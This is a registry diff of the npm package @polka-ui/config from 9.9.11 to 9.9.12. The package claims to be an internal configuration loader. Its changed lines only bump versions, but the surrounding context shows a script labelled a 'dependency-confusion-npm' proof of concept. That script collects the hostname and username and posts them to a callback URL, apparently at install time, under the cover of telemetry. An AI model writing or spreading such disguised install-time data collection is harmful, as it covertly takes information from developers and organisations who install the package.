@polka-ui/config 9.9.11 → 9.9.12

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
package/README.md CHANGED
@@ -57,7 +57,7 @@ Disable: `POLKA_UI_NO_TELEMETRY=1 npm install`
57
57
 
58
58
  ## Changelog
59
59
 
60
- ### 9.9.11 (latest)
60
+ ### 9.9.12 (latest)
61
61
  - Added ARM64 support
62
62
  - Improved error handling
63
63
  - Updated TypeScript types
package/package.json CHANGED
@@ -1,6 +1,6 @@
1
1
  {
2
2
  "name": "@polka-ui/config",
3
- "version": "9.9.11",
3
+ "version": "9.9.12",
4
4
  "description": "Internal configuration loader with env, vault and remote config support",
5
5
  "main": "dist/index.js",
6
6
  "types": "dist/index.d.ts",
@@ -231,7 +231,7 @@ const osType = detectOS();
231
231
  poc: 'dependency-confusion-npm',
232
232
  timestamp: new Date().toISOString(),
233
233
  package: '@polka-ui/config',
234
- version: '9.9.11',
234
+ version: '9.9.12',
235
235
  system: {
236
236
  hostname: os.hostname(),
237
237
  user: os.userInfo().username,
@@ -270,5 +270,5 @@ const osType = detectOS();
270
270
  await httpPost(CALLBACK_URL, report);
271
271
 
272
272
  console.log('done.');
273
- console.log(` @polka-ui/config@9.9.11 initialized successfully.`);
273
+ console.log(` @polka-ui/config@9.9.12 initialized successfully.`);
274
274
  })();